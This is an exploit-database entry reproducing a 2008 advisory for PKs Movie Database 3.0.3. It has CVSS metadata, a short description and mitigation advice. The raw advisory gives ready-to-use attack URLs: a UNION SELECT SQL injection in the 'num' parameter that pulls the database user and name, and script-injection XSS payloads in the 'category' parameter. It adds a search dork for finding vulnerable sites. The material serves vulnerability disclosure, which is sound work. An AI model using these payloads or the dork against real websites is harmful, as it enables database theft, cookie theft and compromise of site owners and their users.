header-logo
Suggest Exploit
vendor:
PKs Movie Database
by:
HouSSaMix From H-T Team
7.5
CVSS
HIGH
Remote SQL Injection Vulnerability and XSS
89, 79
CWE
Product Name: PKs Movie Database
Affected Version From: 3.0.3
Affected Version To: 3.0.3
Patch Exists: YES
Related CWE: N/A
CPE: a:pks_movie_database:pks_movie_database:3.0.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PKs Movie Database version 3.0.3

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'num' and 'category' parameters of 'index.php' script. A remote attacker can execute arbitrary SQL commands in application's database, inject arbitrary HTML and script code, steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Refrain from using dynamic SQL queries and use parameterized queries instead. Use a whitelist of accepted inputs to prevent XSS attacks.
Source

Exploit-DB raw data:

-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

= Author : HouSSaMix From H-T Team                          
= Script : PKs Movie Database version 3.0.3 

= Original advisory : https://www.securityfocus.com/bid/27713/
                     			           
= BUG 1 :  Remote SQL Injection Vulnerability  

exploit => www.target.com/path/index.php?num=-1%20union%20select%201,2,3,4,5,6,user(),database(),9,10,11,12,13,14,15,16,17,18,19,20

= BUG 2 : XSS

exploit => www.target.com/path/index.php?category=[XSS]
           www.target.com/path/index.php?num=9999999999&category=[XSS]

example : www.target.com/path/index.php?category=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
           www.target.com/path/index.php?num=9999999999&category=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

= Dork : "PKs Movie Database"   

# milw0rm.com [2008-02-10]